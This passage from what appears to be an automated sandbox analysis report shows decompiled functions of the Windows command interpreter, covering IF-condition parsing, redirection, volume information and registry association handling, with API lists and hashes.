                                    • Instruction ID: 4d60beba817b71fff9d89e3844ca4d8c32e720c5dda63b5a15b768ccf64682b8
                                    • Opcode Fuzzy Hash: b70cf01f259ef184adec374738a7905b66bbb10c612044aac7d31b3976c0d51c
                                    • Instruction Fuzzy Hash: 74810835A006169BEB3CDF99E85CBBAB7F4EF49704F0584A9E606D7180E7708D80CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 45%
                                    			E011F396E(void* __ecx, short* __edx, long _a4, DWORD* _a8) {
                                    				long _v8;
                                    				char* _v12;
                                    				long _v16;
                                    				void* _v20;
                                    				int _v24;
                                    				short* _v28;
                                    				int _t36;
                                    				signed int _t38;
                                    				int _t41;
                                    				int _t52;
                                    				void* _t54;
                                    				char* _t55;
                                    				int _t57;
                                    				int _t58;
                                    				void _t60;
                                    				int _t62;
                                    				void* _t65;
                                    				DWORD* _t67;
                                    
                                    				_t65 = __ecx;
                                    				_v28 = __edx;
                                    				_v20 = __ecx;
                                    				_t54 = 0x11fd620;
                                    				_v16 = SetFilePointer(__ecx, 0, 0, 1);
                                    				if(_a4 >= 0x1fff) {
                                    					_a4 = 0x1fff;
                                    				}
                                    				__imp__AcquireSRWLockShared(0x1217f20);
                                    				_t36 = ReadFile(_t65, _t54, _a4, _a8, 0);
                                    				__imp__ReleaseSRWLockShared(0x1217f20);
                                    				if(_t36 != 0) {
                                    					_t67 = _a8;
                                    					_t62 =  *_t67;
                                    					if(_t62 == 0) {
                                    						goto L3;
                                    					}
                                    					_t57 = _t62;
                                    					_v8 = _t62;
                                    					if( *0x1203854 == 0xfde9 && _v16 == 0 && _a4 > 3) {
                                    						_push(3);
                                    						_push(0x11d3270);
                                    						_push(_t54);
                                    						L011E82C7();
                                    						_t57 = _t62;
                                    						if(_t36 == 0) {
                                    							_t62 = _t62 + 0xfffffffd;
                                    							_v16 = 3;
                                    							_t54 = 0x11fd623;
                                    							 *_t67 = _t62;
                                    							_v8 = _t62;
                                    							_t57 = _t62;
                                    						}
                                    					}
                                    					_v12 = _t54;
                                    					if(_t62 <= 0) {
                                    						L21:
                                    						_t55 = _v12;
                                    						goto L22;
                                    					} else {
                                    						do {
                                    							if(_t57 < 3) {
                                    								L16:
                                    								if( *((char*)(( *_t54 & 0x000000ff) + 0x1217f30)) == 0) {
                                    									_t57 = _t57 - 1;
                                    									goto L20;
                                    								}
                                    								if(_t57 == 1) {
                                    									__imp__AcquireSRWLockShared(0x1217f20);
                                    									_t28 = _t54 + 1; // 0x11fd621
                                    									_t52 = ReadFile(_v20, _t28, 1,  &_v8, 0);
                                    									__imp__ReleaseSRWLockShared(0x1217f20);
                                    									if(_t52 == 0 || _v8 == 0) {
                                    										 *_a8 =  *_a8 & 0x00000000;
                                    										goto L3;
                                    									} else {
                                    										_t67 = _a8;
                                    										_t62 = _t62 + 1;
                                    										goto L21;
                                    									}
                                    								}
                                    								_push(2);
                                    								_t57 = _t57 + 0xfffffffe;
                                    								_pop(1);
                                    								goto L20;
                                    							}
                                    							_t60 =  *_t54;
                                    							if(_t60 != 0xa ||  *(_t54 + 1) != 0xd) {
                                    								_v24 = _t57;
                                    								if(_t60 != 0xd ||  *(_t54 + 1) != 0xa) {
                                    									goto L16;
                                    								} else {
                                    									goto L24;
                                    								}
                                    							} else {
                                    								L24:
                                    								 *((char*)(_t54 + 2)) = 0;
                                    								_t55 = _v12;
                                    								_t62 = _t54 - _t55 + 2;
                                    								SetFilePointer(_v20, _v16 + _t62, 0, 0);
                                    								L22:
                                    								_t58 =  *0x1203854;
                                    								_t38 = E011E0638(_t58);
                                    								asm("sbb eax, eax");
                                    								_t41 = MultiByteToWideChar(_t58,  ~( ~_t38), _t55, _t62, _v28, _a4);
                                    								 *_t67 = _t41;
                                    								return _t41;
                                    							}
                                    							L20:
                                    							_t54 = _t54 + 1;
                                    							_v8 = _t57;
                                    						} while (_t57 > 0);
                                    						goto L21;
                                    					}
                                    				} else {
                                    					L3:
                                    					return 0;
                                    				}
                                    			}






















                                    APIs
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001,0000000A,00000000,00000001,?,011F3B43,?,?,?,011F977C), ref: 011F398D
                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,011F3B43,?,?,?,011F977C), ref: 011F39A9
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011FD620,?,?,00000000,?,011F3B43,?,?,?,011F977C), ref: 011F39BA
                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,011F3B43,?,?,?,011F977C), ref: 011F39C3
                                    • memcmp.MSVCRT ref: 011F3A02
                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,?,01217F20,?,?,?,011F3B43,?,?,?,011F977C), ref: 011F3A93
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,?,011F3B43,?,?,?,011F977C), ref: 011F3ABE
                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,011F3B43,?,?,?,011F977C), ref: 011F3ACB
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,011FD621,00000001,011F977C,00000000,?,011F3B43,?,?,?,011F977C), ref: 011F3AE0
                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,011F3B43,?,?,?,011F977C), ref: 011F3AED
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: FileLockShared$AcquirePointerReadRelease$ByteCharMultiWidememcmp
                                    • String ID:
                                    • API String ID: 2002953238-0
                                    • Opcode ID: 53493e86bd9de619dd3d1388a24d48fc76c1e364cfe2fb9351ba471fa43fbdee
                                    • Instruction ID: 2a932ff4d00e50243cfc1cb7b4d9efb4e6b448031b20eb7c8a4e544b029da471
                                    • Opcode Fuzzy Hash: 53493e86bd9de619dd3d1388a24d48fc76c1e364cfe2fb9351ba471fa43fbdee
                                    • Instruction Fuzzy Hash: F451E472E20205AFDF29CF69D848BB9BBB9FF94710F04405DEA25DB280C7718984CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 32%
                                    			E011DCDA2(void* __ecx) {
                                    				void* __ebp;
                                    				void* _t2;
                                    				signed int _t4;
                                    				intOrPtr _t6;
                                    				void* _t18;
                                    				void* _t23;
                                    				void* _t33;
                                    				intOrPtr* _t36;
                                    
                                    				_push(__ecx);
                                    				_t33 = __ecx;
                                    				_t2 = E011DF030(0);
                                    				_t40 = _t2 - 0x4000;
                                    				if(_t2 != 0x4000) {
                                    					E011F82EB(0);
                                    				}
                                    				_t4 = E011DE9A0(0, _t40);
                                    				_t36 = _t4;
                                    				__imp___wcsicmp(L"ERRORLEVEL", 0x120faa0);
                                    				_pop(_t18);
                                    				if(_t4 == 0) {
                                    					 *_t36 = 0x35;
                                    					goto L14;
                                    				} else {
                                    					__imp___wcsicmp(L"EXIST", 0x120faa0);
                                    					_pop(_t18);
                                    					if(_t4 == 0) {
                                    						 *_t36 = 0x37;
                                    						L14:
                                    						_t6 = E011DEA40(E011DDDCD(_t18, _t18, 0), 0);
                                    						L12:
                                    						 *((intOrPtr*)(_t36 + 0x3c)) = _t6;
                                    						L9:
                                    						return _t36;
                                    					}
                                    					if( *0x1213cc9 == 0) {
                                    						L7:
                                    						__imp___wcsicmp(L"NOT", 0x120faa0);
                                    						_pop(_t23);
                                    						if(_t4 == 0) {
                                    							__eflags = _t33;
                                    							if(_t33 != 0) {
                                    								E011F82EB(_t23);
                                    							}
                                    							 *_t36 = 0x38;
                                    							__eflags = 1;
                                    							_t6 = E011DCDA2(1);
                                    							goto L12;
                                    						}
                                    						E011DF300(_t4, 0, 0, 0);
                                    						 *_t36 = 0x39;
                                    						E011D9520(_t36);
                                    						goto L9;
                                    					}
                                    					__imp___wcsicmp(L"CMDEXTVERSION", 0x120faa0);
                                    					_pop(_t18);
                                    					if(_t4 == 0) {
                                    						 *_t36 = 0x34;
                                    						goto L14;
                                    					}
                                    					if( *0x1213cc9 == 0) {
                                    						goto L7;
                                    					}
                                    					__imp___wcsicmp(L"DEFINED", 0x120faa0);
                                    					_pop(_t18);
                                    					if(_t4 == 0) {
                                    						 *_t36 = 0x36;
                                    						goto L14;
                                    					}
                                    					goto L7;
                                    				}
                                    			}












                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _wcsicmp
                                    • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                    • API String ID: 2081463915-1668778490
                                    • Opcode ID: 4e631e91ebf9a9762baa4beb6c7aa15b5fdf1ced6c5ac39fbcdbcd7f4a6ddbd7
                                    • Instruction ID: c7bf34167b3254974b6e8411aea9e032114d969f92fb0106cb8cb3ad50d2847c
                                    • Opcode Fuzzy Hash: 4e631e91ebf9a9762baa4beb6c7aa15b5fdf1ced6c5ac39fbcdbcd7f4a6ddbd7
                                    • Instruction Fuzzy Hash: 08210BB16487139AFB3D5B7AA81972B7ECEDF541A4F14481FE143811C0EF759840C39A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 69%
                                    			E011DD97E(signed int* __ecx, signed int __edx) {
                                    				signed int _v8;
                                    				long _v20;
                                    				char _v24;
                                    				int _v28;
                                    				void _v548;
                                    				signed int _v552;
                                    				signed int* _v556;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t56;
                                    				signed int* _t68;
                                    				signed int _t75;
                                    				signed int _t76;
                                    				WCHAR* _t80;
                                    				WCHAR* _t83;
                                    				void* _t89;
                                    				void* _t90;
                                    				signed int _t92;
                                    				void* _t93;
                                    				WCHAR* _t95;
                                    				WCHAR* _t103;
                                    				WCHAR* _t110;
                                    				void* _t116;
                                    				signed int _t120;
                                    				signed int _t123;
                                    				void* _t128;
                                    				signed int _t129;
                                    				signed int _t130;
                                    				void* _t133;
                                    				signed int _t135;
                                    				signed int _t136;
                                    				signed int _t137;
                                    
                                    				_t124 = __edx;
                                    				_t56 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t56 ^ _t137;
                                    				_t134 = 0x104;
                                    				_v552 = __edx;
                                    				_t95 = 0;
                                    				_v24 = 1;
                                    				_v28 = 0;
                                    				_t129 = __ecx;
                                    				_v20 = 0x104;
                                    				_v556 = __ecx;
                                    				memset( &_v548, 0, 0x104);
                                    				if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
                                    					L33:
                                    					_t95 = 1;
                                    					L30:
                                    					__imp__??_V@YAXPAX@Z();
                                    					return E011E6FD0(_t95, _t95, _v8 ^ _t137, _t124, _t129, _t134, _v28);
                                    				}
                                    				_t135 =  *(_t129 + 0x34);
                                    				if(_t135 == 0) {
                                    					L11:
                                    					_t134 = _v552;
                                    					if(_t134 == 3) {
                                    						_t68 =  *0x1213cd4;
                                    						_v556 = _t68;
                                    						L14:
                                    						_t129 =  *(_t129 + 0x34);
                                    						if(_t129 == 0) {
                                    							goto L30;
                                    						}
                                    						_t134 = _t134 | 0xffffffff;
                                    						do {
                                    							if( *(_t129 + 8) != _t95) {
                                    								goto L29;
                                    							}
                                    							__imp___get_osfhandle( *_t129);
                                    							if(_t68 == _t134) {
                                    								L39:
                                    								 *(_t129 + 8) = _t134;
                                    								L22:
                                    								_t103 =  *(_t129 + 4);
                                    								if( *_t103 == 0x26) {
                                    									_t103[2] = 0;
                                    									_t124 =  *_t129;
                                    									_t105 = (( *(_t129 + 4))[1] & 0x0000ffff) - 0x30;
                                    									if(E011DDBFC((( *(_t129 + 4))[1] & 0x0000ffff) - 0x30,  *_t129) != _t134) {
                                    										goto L29;
                                    									}
                                    									L52:
                                    									E011DD937();
                                    									_t134 = 0x1213d00;
                                    									E011E274C(0x1213d00, 0x104, L"%d",  *_t129);
                                    									E011DC5A2(_t105, 0x2344, 1, 0x1213d00);
                                    									goto L33;
                                    								}
                                    								_push(_t103);
                                    								if( *((short*)(_t129 + 0x10)) == 0x3c) {
                                    									_t124 = 0x8000;
                                    									_t75 = E011DD120(_t103, 0x8000);
                                    									_v552 = _t75;
                                    									if(_t75 != _t134) {
                                    										L26:
                                    										if(_t75 !=  *_t129) {
                                    											_t124 =  *_t129;
                                    											_t76 = E011DDBFC(_t75,  *_t129);
                                    											_t105 = _v552;
                                    											_t136 = _t76;
                                    											E011DDB92(_v552);
                                    											if(_t136 == 0xffffffff) {
                                    												goto L52;
                                    											}
                                    											_t75 =  *_t129;
                                    											_t134 = _t136 | 0xffffffff;
                                    										}
                                    										if(_t75 == _t134) {
                                    											L53:
                                    											E011DD937();
                                    											E011F985A( *0x1213cf0);
                                    											goto L33;
                                    										}
                                    										_v556[1] = _t75;
                                    										goto L29;
                                    									}
                                    									_t80 = E011E3320(L"DPATH");
                                    									if(_t80 == 0) {
                                    										goto L53;
                                    									}
                                    									_t110 = _v28;
                                    									if(_t110 == 0) {
                                    										_t110 =  &_v548;
                                    									}
                                    									if(SearchPathW(_t80,  *(_t129 + 4), _t95, _v20, _t110, _t95) == 0) {
                                    										goto L53;
                                    									} else {
                                    										_t103 = _v28;
                                    										if(_t103 == 0) {
                                    											_t103 =  &_v548;
                                    										}
                                    										_push(_t103);
                                    										_t124 = 0x8000;
                                    										L25:
                                    										_t75 = E011DD120(_t103, _t124);
                                    										_v552 = _t75;
                                    										if(_t75 == _t134) {
                                    											goto L53;
                                    										}
                                    										goto L26;
                                    									}
                                    								}
                                    								asm("sbb edx, edx");
                                    								_t124 = ( ~( *(_t129 + 0xc)) & 0xfffffe09) + 0x301;
                                    								goto L25;
                                    							}
                                    							__imp___get_osfhandle( *_t129);
                                    							if(_t68 == 0xfffffffe) {
                                    								goto L39;
                                    							}
                                    							if(E011E0178(_t68) == 0) {
                                    								_t82 = E011F9953(_t82,  *_t129);
                                    								if(_t82 != 0) {
                                    									goto L20;
                                    								}
                                    								__imp___get_osfhandle( *_t129, _t95, _t95, 1);
                                    								_pop(_t114);
                                    								if(_t82 != _t134) {
                                    									goto L20;
                                    								}
                                    								_t134 = 0x1213d00;
                                    								E011E274C(0x1213d00, 0x104, L"%d",  *_t129);
                                    								_push(0x1213d00);
                                    								_push(1);
                                    								_push(0x40002721);
                                    								L51:
                                    								E011DC5A2(_t114);
                                    								 *(_t129 + 8) = _t95;
                                    								E011DD937();
                                    								goto L33;
                                    							}
                                    							L20:
                                    							_t114 =  *_t129;
                                    							_t83 = E011DDBCE(_t82,  *_t129);
                                    							 *(_t129 + 8) = _t83;
                                    							if(_t83 == _t134) {
                                    								_t134 = 0x1213d00;
                                    								E011E274C(0x1213d00, 0x104, L"%d",  *_t129);
                                    								_push(0x1213d00);
                                    								_push(1);
                                    								_push(0x2344);
                                    								goto L51;
                                    							}
                                    							E011DDB92( *_t129);
                                    							goto L22;
                                    							L29:
                                    							_t68 =  *(_t129 + 0x14);
                                    							_t129 = _t68;
                                    						} while (_t68 != 0);
                                    						goto L30;
                                    					}
                                    					_t116 = 0x10;
                                    					_t68 = E011E00B0(_t116);
                                    					_v556 = _t68;
                                    					if(_t68 == 0) {
                                    						goto L33;
                                    					}
                                    					_t68[3] =  *0x1213cd4;
                                    					 *0x1213cd4 = _t68;
                                    					_t68[2] = _t129;
                                    					 *_t68 = _t134;
                                    					goto L14;
                                    				} else {
                                    					goto L2;
                                    				}
                                    				do {
                                    					L2:
                                    					_t118 =  *(_t135 + 4);
                                    					_t130 =  *(_t135 + 4);
                                    					_t128 = _t130 + 2;
                                    					do {
                                    						_t89 =  *_t130;
                                    						_t130 = _t130 + 2;
                                    					} while (_t89 != _t95);
                                    					_t90 = E011E22C0(_t95, _t118);
                                    					_t124 = (_t130 - _t128 >> 1) + 1;
                                    					E011E1040( *(_t135 + 4), (_t130 - _t128 >> 1) + 1, _t90);
                                    					if( *((intOrPtr*)(_t135 + 8)) != _t95) {
                                    						goto L9;
                                    					}
                                    					_t124 =  *(_t135 + 4);
                                    					_t120 = _t124;
                                    					_t133 = _t120 + 2;
                                    					do {
                                    						_t93 =  *_t120;
                                    						_t120 = _t120 + 2;
                                    					} while (_t93 != _t95);
                                    					_t123 = (_t120 - _t133 >> 1) - 1;
                                    					if(_t123 > 1 &&  *((short*)(_t124 + _t123 * 2)) == 0x3a) {
                                    						 *((short*)(_t124 + _t123 * 2)) = 0;
                                    					}
                                    					L9:
                                    					_t92 =  *(_t135 + 0x14);
                                    					_t135 = _t92;
                                    				} while (_t92 != 0);
                                    				_t129 = _v556;
                                    				goto L11;
                                    			}





































                                    APIs
                                    • memset.MSVCRT ref: 011DD9BE
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • _get_osfhandle.MSVCRT ref: 011DDAA6
                                    • _get_osfhandle.MSVCRT ref: 011DDAB7
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DDB53
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _get_osfhandlememset
                                    • String ID: DPATH
                                    • API String ID: 3784859044-2010427443
                                    • Opcode ID: 58cb7c300d46dc766b43c71f9d40c6ecaf1f5ea46c9aa7ae8ea77bd334a03f73
                                    • Instruction ID: 63e866420da51ac2be241b7621f2ca99e67be17c8e9060e40eaa3eab2779bae5
                                    • Opcode Fuzzy Hash: 58cb7c300d46dc766b43c71f9d40c6ecaf1f5ea46c9aa7ae8ea77bd334a03f73
                                    • Instruction Fuzzy Hash: E0912870A00516AFDF2DEFE8EC88AAABBE1FF54318B144159E505972C4DB31A980CB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 38%
                                    			E011F6B30(void* __ebx, signed short* _a4) {
                                    				signed int _v8;
                                    				char _v268;
                                    				intOrPtr _v272;
                                    				short _v276;
                                    				short _v790;
                                    				signed short _v802;
                                    				long _v804;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t20;
                                    				short _t22;
                                    				intOrPtr _t23;
                                    				signed short _t24;
                                    				void* _t29;
                                    				signed short _t33;
                                    				signed short _t34;
                                    				long _t52;
                                    				signed short* _t54;
                                    				void* _t56;
                                    				signed short* _t57;
                                    				long _t60;
                                    				void* _t66;
                                    				long _t68;
                                    				DWORD* _t70;
                                    				signed short* _t71;
                                    				void* _t72;
                                    				signed short* _t74;
                                    				void* _t75;
                                    				signed int _t76;
                                    				signed int _t78;
                                    				signed int _t80;
                                    				void* _t81;
                                    
                                    				_t56 = __ebx;
                                    				_t80 = (_t78 & 0xfffffff8) - 0x320;
                                    				_t20 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t20 ^ _t80;
                                    				_t22 =  *L" :\\"; // 0x3a0020
                                    				_t74 = _a4;
                                    				_t70 = 0;
                                    				_v276 = _t22;
                                    				_t23 =  *0x11d3a8c; // 0x5c
                                    				_t68 =  *_t74 & 0x0000ffff;
                                    				_v272 = _t23;
                                    				_v804 = 0;
                                    				if(_t68 != 0) {
                                    					_t57 = _t74;
                                    					_t71 =  &(_t57[1]);
                                    					do {
                                    						_t24 =  *_t57;
                                    						_t57 =  &(_t57[1]);
                                    					} while (_t24 != _v804);
                                    					if(_t57 - _t71 >> 1 != 2 || _t74[1] != 0x3a || iswalpha(_t68) == 0) {
                                    						E011E25D9(L"\r\n");
                                    						_pop(_t60);
                                    						_push(0);
                                    						_push(0xf);
                                    						goto L19;
                                    					} else {
                                    						_t33 = towupper( *_t74 & 0x0000ffff);
                                    						_t70 = 0;
                                    						goto L10;
                                    					}
                                    				} else {
                                    					_t54 =  *0x1213cb8;
                                    					if(_t54 == 0) {
                                    						_t54 = 0x1213ab0;
                                    					}
                                    					_t33 = towupper( *_t54 & 0x0000ffff);
                                    					L10:
                                    					_pop(_t66);
                                    					_t34 = _t33 & 0x0000ffff;
                                    					_t76 = _t34 & 0x0000ffff;
                                    					_v276 = _t34;
                                    					if(GetVolumeInformationW( &_v276,  &_v790, 0x101,  &_v804, _t70, _t70, _t70, _t70) != 0) {
                                    						_push(_t76);
                                    						_push(L"%c");
                                    						_push(0x104);
                                    						_push(0x1213d00);
                                    						if(_v790 == 0) {
                                    							E011E274C();
                                    							E011DC108(_t66, 0x235e, 1, 0x1213d00);
                                    							_t81 = _t80 + 0x1c;
                                    						} else {
                                    							E011E274C();
                                    							_push( &_v790);
                                    							E011DC108(_t66, 0x235f, 2, 0x1213d00);
                                    							_t81 = _t80 + 0x20;
                                    						}
                                    						_push(_v804 & 0x0000ffff);
                                    						E011E274C( &_v268, 0x80, L"%04X-%04X", _v802 & 0x0000ffff);
                                    						E011DC108(_t66, 0x235b, 1,  &_v268);
                                    						_t80 = _t81 + 0x20;
                                    						_t29 = 0;
                                    					} else {
                                    						E011E25D9(L"\r\n");
                                    						_t52 = GetLastError();
                                    						_t60 = 0x15;
                                    						if(_t52 != _t60) {
                                    							_t60 = GetLastError();
                                    						}
                                    						_push(_t70);
                                    						_push(_t60);
                                    						L19:
                                    						E011DC5A2(_t60);
                                    						_t29 = 1;
                                    					}
                                    				}
                                    				_pop(_t72);
                                    				_pop(_t75);
                                    				return E011E6FD0(_t29, _t56, _v8 ^ _t80, _t68, _t72, _t75);
                                    			}


                                    APIs
                                    • towupper.MSVCRT ref: 011F6B89
                                    • iswalpha.MSVCRT ref: 011F6BBC
                                    • towupper.MSVCRT ref: 011F6BCF
                                    • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000101,?,00000000,00000000,00000000,00000000), ref: 011F6C01
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011F6C16
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011F6C23
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ErrorLasttowupper$InformationVolumeiswalpha
                                    • String ID: :\$%04X-%04X
                                    • API String ID: 4001382275-3541097225
                                    • Opcode ID: 431c224ec335d2b4ab4bf965216a75d77cd70cf90f2f8f08e135fcf3511fa8e0
                                    • Instruction ID: 0c3c56ab88baa50d37139f89b05fd20c98300b6c5c9de13c38edc88f738beb76
                                    • Opcode Fuzzy Hash: 431c224ec335d2b4ab4bf965216a75d77cd70cf90f2f8f08e135fcf3511fa8e0
                                    • Instruction Fuzzy Hash: A1412D72A04211AAD738EBA59C19FB777ECEFA8B14F00041DFA95C7180EB74D540C7A2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 41%
                                    			E011F587B(void* __ebx, void* __ecx, short* __edx, void* __edi, void* __esi, void* __eflags) {
                                    				char* _t23;
                                    				char _t38;
                                    				short* _t44;
                                    				char* _t48;
                                    				char* _t51;
                                    				char* _t55;
                                    				char* _t56;
                                    				char* _t57;
                                    				void* _t58;
                                    
                                    				_t45 = __ecx;
                                    				_push(0x18);
                                    				_push(0x11fc0e0);
                                    				E011E7678(__ebx, __edi, __esi);
                                    				_t44 = __edx;
                                    				 *(_t58 - 0x20) = __ecx;
                                    				_t23 =  *(_t58 + 8);
                                    				if(_t23 == 0 ||  *_t23 == 0) {
                                    					__imp__RegDeleteKeyExW(_t45, _t44, 0, 0);
                                    					_t55 = _t23;
                                    					 *(_t58 - 0x1c) = _t55;
                                    					if(_t55 == 0) {
                                    						goto L16;
                                    					}
                                    					_t56 = RegOpenKeyExW( *(_t58 - 0x20), _t44, 0, 0x2000000, _t58 - 0x24);
                                    					 *(_t58 - 0x1c) = _t56;
                                    					if(_t56 == 0) {
                                    						_t55 = RegDeleteValueW( *(_t58 - 0x24), 0x11d24ac);
                                    						 *(_t58 - 0x1c) = _t55;
                                    						if(_t55 != 0) {
                                    							_push(0);
                                    							E011DC5A2(_t45);
                                    							_t45 = _t55;
                                    						}
                                    						RegCloseKey( *(_t58 - 0x24));
                                    					} else {
                                    						if(_t56 != 2) {
                                    							_push(0);
                                    							E011DC5A2(_t45);
                                    							_t45 = _t56;
                                    						}
                                    					}
                                    					goto L15;
                                    				} else {
                                    					_t55 = RegCreateKeyExW(__ecx, __edx, 0, 0, 0, 2, 0, _t58 - 0x20, 0);
                                    					 *(_t58 - 0x1c) = _t55;
                                    					if(_t55 != 0) {
                                    						L7:
                                    						_push(0);
                                    						_push(_t55);
                                    						E011DC5A2(_t45);
                                    						E011DC5A2(_t45, 0x235d, 1, _t44);
                                    						goto L15;
                                    					} else {
                                    						_t51 =  *(_t58 + 8);
                                    						_t48 = _t51;
                                    						_t57 =  &(_t48[2]);
                                    						do {
                                    							_t38 =  *_t48;
                                    							_t48 =  &(_t48[2]);
                                    						} while (_t38 != 0);
                                    						_t45 = _t48 - _t57 >> 1;
                                    						_t55 = RegSetValueExW( *(_t58 - 0x20), 0, 0, 1, _t51, 2 + (_t48 - _t57 >> 1) * 2);
                                    						 *(_t58 - 0x1c) = _t55;
                                    						RegCloseKey( *(_t58 - 0x20));
                                    						if(_t55 != 0) {
                                    							goto L7;
                                    						}
                                    						_push( *(_t58 + 8));
                                    						_push(_t44);
                                    						E011E25D9(L"%s=%s\r\n");
                                    						L15:
                                    						if(_t55 != 0) {
                                    							L19:
                                    							return E011E76BD(_t55);
                                    						}
                                    						L16:
                                    						 *((intOrPtr*)(_t58 - 4)) = 0;
                                    						if(E011E7797(_t45) != 0) {
                                    							 *0x121c020(0x8000000, 0, 0, 0);
                                    						}
                                    						 *((intOrPtr*)(_t58 - 4)) = 0xfffffffe;
                                    						goto L19;
                                    					}
                                    				}
                                    			}


                                    APIs
                                    • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F58AF
                                    • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,011FC0E0), ref: 011F58E5
                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F58F3
                                    • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F5930
                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F594D
                                    • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,011D24AC,?,00000000,02000000,?,?,?,00000000,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F5974
                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F598F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CloseDeleteValue$CreateOpen
                                    • String ID: %s=%s
                                    • API String ID: 1019019434-1087296587
                                    • Opcode ID: 3e8eb67b1e6a88b527e521f8d30474403b6c310a0da718c821254a4e3c02e35c
                                    • Instruction ID: 85b48d7eeabf79c9d233efdde780bb9a860294e60f88be58d793f1591e34926a
                                    • Opcode Fuzzy Hash: 3e8eb67b1e6a88b527e521f8d30474403b6c310a0da718c821254a4e3c02e35c
                                    • Instruction Fuzzy Hash: 3D31B071D00615AAEB3D9B5A9C0DEAF7E79EF8AF64B05410CF90566250E7204E01CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

